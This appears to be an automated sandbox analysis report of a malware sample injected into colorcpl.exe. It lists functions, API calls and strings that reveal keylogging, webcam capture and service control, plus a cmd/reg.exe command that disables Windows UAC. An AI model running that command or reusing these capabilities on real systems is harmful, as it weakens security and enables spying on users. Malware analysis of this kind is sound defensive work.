                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3160817290-0
                                                                                                                              • Opcode ID: c64c914efea9692d2614cc2584daee37083dc716317b26dbfc5cc48192673cf6
                                                                                                                              • Instruction ID: 324a0eaea5a0fef55c5cfcabc9abcb3c3650a3b9919399c3741820d1b227eaaf
                                                                                                                              • Opcode Fuzzy Hash: c64c914efea9692d2614cc2584daee37083dc716317b26dbfc5cc48192673cf6
                                                                                                                              • Instruction Fuzzy Hash: 92F0F936644F002BD71133287C48B7A2515DFD276DF28011CF92493280FF64EC654DE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC20
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC34
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC41
                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC50
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC62
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 221034970-0
                                                                                                                              • Opcode ID: 19e951a666cc6d74f0093ed4ccfc15953a867b13e618653066bbe91d07a34075
                                                                                                                              • Instruction ID: dea9e6e719cd6a967c96d642c787dc6debba211af74d3921490a1cf7b8381151
                                                                                                                              • Opcode Fuzzy Hash: 19e951a666cc6d74f0093ed4ccfc15953a867b13e618653066bbe91d07a34075
                                                                                                                              • Instruction Fuzzy Hash: D7F0C2B15005387BD310AB64AC49DFF3BACDB86355F00001DFF0992140FB389D4989E4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAB5
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAC9
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAD6
                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAE5
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAF7
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAFA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 221034970-0
                                                                                                                              • Opcode ID: 6c9fe1b42c1b6b41c48a42d3ff74f3b83d8193541b14d80b9c98c3b7c82ff7b0
                                                                                                                              • Instruction ID: 4c75509528545d0e54e32b1edc8bf8f660db54ef24032ad39b34d004cb7f25e2
                                                                                                                              • Opcode Fuzzy Hash: 6c9fe1b42c1b6b41c48a42d3ff74f3b83d8193541b14d80b9c98c3b7c82ff7b0
                                                                                                                              • Instruction Fuzzy Hash: 37F0C2715406286BD720AA65AC48EFF3BACDB46355F00001DFE0982140FB789D8A9AE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABB9
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABCD
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABDA
                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABE9
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABFB
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 221034970-0
                                                                                                                              • Opcode ID: 5b7273e3d9e82ff7db9ada0829158cc6c8136984bbb77b06694fba95aa956d90
                                                                                                                              • Instruction ID: 90d3cafbbf301cbec70ef1f086179618f2007e846ec278d66080ac718df03e66
                                                                                                                              • Opcode Fuzzy Hash: 5b7273e3d9e82ff7db9ada0829158cc6c8136984bbb77b06694fba95aa956d90
                                                                                                                              • Instruction Fuzzy Hash: 27F0AFB15045286BE7106B649C49DFF3BACDB46755F40001DFE0992140FB389D4985E4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066FACC0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 176COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: H_prolog
                                                                                                                              • String ID: S~E$PG$PG$PG
                                                                                                                              • API String ID: 3519838083-2466073847
                                                                                                                              • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                                                                                                              • Instruction ID: 38b4ac3267cd3ab6e85f9004cf4f053acb826e5e09c0100b8af3d34fd0659a9f
                                                                                                                              • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                                                                                                              • Instruction Fuzzy Hash: BA51B330E112489ADBC4FBB4CC61AFD7B7EAF44700F00442EE55AAB190EE649E89C758
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E2576 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 066E25CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Init_thread_footer__onexit
                                                                                                                              • String ID: PkG$XMG$NG$NG
                                                                                                                              • API String ID: 1881088180-3151166067
                                                                                                                              • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                                                                                                              • Instruction ID: 901bfe7bef556a40b0633064041d8a9ee1a1989fe65b517f8c9c22b2328daff5
                                                                                                                              • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                                                                                                              • Instruction Fuzzy Hash: 0441BA316152108BC7E8FB24DD65EBE779EBB81710F10452EE06A972E0DF30AA49C759
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0672350D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: PkGNG
                                                                                                                              • API String ID: 0-263838557
                                                                                                                              • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                              • Instruction ID: eb789758ccec58daabc62b3773e3ff1fd5f6cbc7759d96a6fadc80fcb1d6dea6
                                                                                                                              • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                                              • Instruction Fuzzy Hash: F5411BB1A00765AFE7A4DF7CCC44B6A7BE8EB49720F10862BF225DB280D675A5418790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A3435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 046A3475
                                                                                                                              • _free.LIBCMT ref: 046A3540
                                                                                                                              • _free.LIBCMT ref: 046A354A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$`.A
                                                                                                                              • API String ID: 2506810119-2653347025
                                                                                                                              • Opcode ID: 0042be283bfe42e27d0203f5b787c1b3e89a1047e889ff2669c400b4143366ef
                                                                                                                              • Instruction ID: 35d0ec49c3beb177aca18f115d4218d7235a6a513812b5aa3e2d45af64219f45
                                                                                                                              • Opcode Fuzzy Hash: 0042be283bfe42e27d0203f5b787c1b3e89a1047e889ff2669c400b4143366ef
                                                                                                                              • Instruction Fuzzy Hash: 01319271A00B58AFDB21DF99D88499EBBFCEF85714B1440AAE90497310F670AE91CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B68A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,046D50E4), ref: 0467363D
                                                                                                                                • Part of subcall function 0467361B: RegQueryValueExW.ADVAPI32(?,0466F313,00000000,00000000,?,00000400), ref: 0467365C
                                                                                                                                • Part of subcall function 0467361B: RegCloseKey.ADVAPI32(?), ref: 04673665
                                                                                                                                • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
                                                                                                                              • _wcslen.LIBCMT ref: 0467B763
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                              • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                              • API String ID: 37874593-4246244872
                                                                                                                              • Opcode ID: b6b3c310da00fbd2e0ce9091d0c658a7bb799c39a8a3a36a146580985462a8fc
                                                                                                                              • Instruction ID: 4774e57521d43158cd48b26225db1f425b0fb071d1be322f6dc6ad43367bd8e4
                                                                                                                              • Opcode Fuzzy Hash: b6b3c310da00fbd2e0ce9091d0c658a7bb799c39a8a3a36a146580985462a8fc
                                                                                                                              • Instruction Fuzzy Hash: D6214F72A001046BEB14FAB88C959FE76ADDB45628B14057DE806A7280FE74BD0987A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
                                                                                                                              • wsprintfW.USER32 ref: 0466B1F3
                                                                                                                                • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                              • API String ID: 1497725170-248792730
                                                                                                                              • Opcode ID: 7668c5f32bb2fdf5d27d023b6a79f683cb34f111f112eda4fb4175f906875869
                                                                                                                              • Instruction ID: 655343f635e03e5a1af95ff2591046cafd309b06ba80b0abe275a5ee4d90d899
                                                                                                                              • Opcode Fuzzy Hash: 7668c5f32bb2fdf5d27d023b6a79f683cb34f111f112eda4fb4175f906875869
                                                                                                                              • Instruction Fuzzy Hash: 1F114272504118AA9B18BB94EC548FE77FCEE49315B00011EF40796190FF74BE45C6EC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A3A33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (]?
                                                                                                                              • API String ID: 0-1886175342
                                                                                                                              • Opcode ID: eb958ff257bf0a4852a920068f473cb579aba7fa77d2949ff2d3fb07dc418e32
                                                                                                                              • Instruction ID: 8756c5fc314b2e30e2a252e1f6a6f17929b9afd236f4f2a78bf3d86e2cb458db
                                                                                                                              • Opcode Fuzzy Hash: eb958ff257bf0a4852a920068f473cb579aba7fa77d2949ff2d3fb07dc418e32
                                                                                                                              • Instruction Fuzzy Hash: 5101A7B3B09B257EF7205978ACC0F67260DDF517B8B240329BA31513D0FA74ECA149A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04667755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0466779B
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 046677AA
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 046677AF
                                                                                                                              Strings
                                                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 04667796
                                                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 04667791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                              • API String ID: 2922976086-4183131282
                                                                                                                              • Opcode ID: e531ba7ddabfa48dcd92e153c9a62ae874d5a376c78080213aeb0354c3bb0cd2
                                                                                                                              • Instruction ID: 6330287348f857f1e5a6553ad249e663cdfa277a931d9fc4305c48518912238e
                                                                                                                              • Opcode Fuzzy Hash: e531ba7ddabfa48dcd92e153c9a62ae874d5a376c78080213aeb0354c3bb0cd2
                                                                                                                              • Instruction Fuzzy Hash: EBF01272D4029D76DB20AAD6DC0DEDF7F7DEBC5B51F00055AB604A6140E6706844CAB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,046A32EB,00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002), ref: 046A335A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 046A336D
                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,046A32EB,00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002), ref: 046A3390
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                              • Opcode ID: e562e1bb07e775e979af0a7e0108271961ddb0e48e27ebb8e5ace273d449b3c3
                                                                                                                              • Instruction ID: 9df02adad4cbb279a0a9e0a2fe4a9402a954a968a0267af590c9ad54d26f82d6
                                                                                                                              • Opcode Fuzzy Hash: e562e1bb07e775e979af0a7e0108271961ddb0e48e27ebb8e5ace273d449b3c3
                                                                                                                              • Instruction Fuzzy Hash: CAF0A430A05619BBCF109F51D808BADBFB4EF04712F004158F905A2340EF746D84CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046650E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,046D4EF8,04664E7A,00000001,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665120
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 0466512C
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665137
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665140
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                                              • API String ID: 2993684571-305739064
                                                                                                                              • Opcode ID: 3e5a23b87ba5d648f23a84354361416f21aa807bd031d4b4a53dc9a3a70d1a1b
                                                                                                                              • Instruction ID: 8b56358b28c972b85956c8b6e48a8d1505f9c1119ab9448e3045f5908f058cff
                                                                                                                              • Opcode Fuzzy Hash: 3e5a23b87ba5d648f23a84354361416f21aa807bd031d4b4a53dc9a3a70d1a1b
                                                                                                                              • Instruction Fuzzy Hash: EBF090B1D143007FEB203B74DD0EA7ABF98EB16318F00155DE98382650F575A894CF96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0467ADF2
                                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0467AE00
                                                                                                                              • Sleep.KERNEL32(00002710), ref: 0467AE07
                                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0467AE10
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                              • String ID: Alarm triggered
                                                                                                                              • API String ID: 614609389-2816303416
                                                                                                                              • Opcode ID: e0737cda0f173ec505e6f3a3dfb6e9388fed62098fdc2bc622ccdf2f2d444614
                                                                                                                              • Instruction ID: e88345a5b63227e5639d8b1f11bf7761eccc8ec8076fa6ee4a35918879c3904c
                                                                                                                              • Opcode Fuzzy Hash: e0737cda0f173ec505e6f3a3dfb6e9388fed62098fdc2bc622ccdf2f2d444614
                                                                                                                              • Instruction Fuzzy Hash: 82E09262E40110376720337AAD0ECBF3E28DAC6B10301106DFB0A56040F9542C558AF2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a3fe7169983f2cc59b769d106c7870f7c4ba5204f383380ca89d3469e80acae
                                                                                                                              • Instruction ID: 8b9c7ebf276ffdc0a514236ca389e24bd7b755f5df16c2e4a97f8cd379394e48
                                                                                                                              • Opcode Fuzzy Hash: 3a3fe7169983f2cc59b769d106c7870f7c4ba5204f383380ca89d3469e80acae
                                                                                                                              • Instruction Fuzzy Hash: A97195B59006169BDF21CF58C8449FEBBB9EF57364F584129E42267280F770AD51CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,0466D262), ref: 046644C4
                                                                                                                                • Part of subcall function 04664607: __EH_prolog.LIBCMT ref: 0466460C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: H_prologSleep
                                                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                              • API String ID: 3469354165-3547787478
                                                                                                                              • Opcode ID: 96a737a5a4f246520c2e169b002bef157a6d178b704a1bd38c2587c73338cbce
                                                                                                                              • Instruction ID: 5b3afb9ffb6e0086681abd58fb9e8c0af9747f4b6ff371bd7050c5a903f41d67
                                                                                                                              • Opcode Fuzzy Hash: 96a737a5a4f246520c2e169b002bef157a6d178b704a1bd38c2587c73338cbce
                                                                                                                              • Instruction Fuzzy Hash: 2051E131B04311ABEB14FB349864AAE3B9AEB96648F04045CE90797780FF34BD05C79E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A4CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • _free.LIBCMT ref: 046A4E06
                                                                                                                              • _free.LIBCMT ref: 046A4E1D
                                                                                                                              • _free.LIBCMT ref: 046A4E3C
                                                                                                                              • _free.LIBCMT ref: 046A4E57
                                                                                                                              • _free.LIBCMT ref: 046A4E6E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$AllocHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1835388192-0
                                                                                                                              • Opcode ID: 01a9bb1c941a696d13aeecaf0e35cc5162399e94ed392be2464b4fac1415a792
                                                                                                                              • Instruction ID: 0a1f7228058800ef3ba96d52afbd475e17eb43f06bda871553efaa058d08c5e6
                                                                                                                              • Opcode Fuzzy Hash: 01a9bb1c941a696d13aeecaf0e35cc5162399e94ed392be2464b4fac1415a792
                                                                                                                              • Instruction Fuzzy Hash: 9751A071A00B04ABDB21DF29CD40A66B7F4EF54728B14466DE849D7250FB71FD618F80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06725A07 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
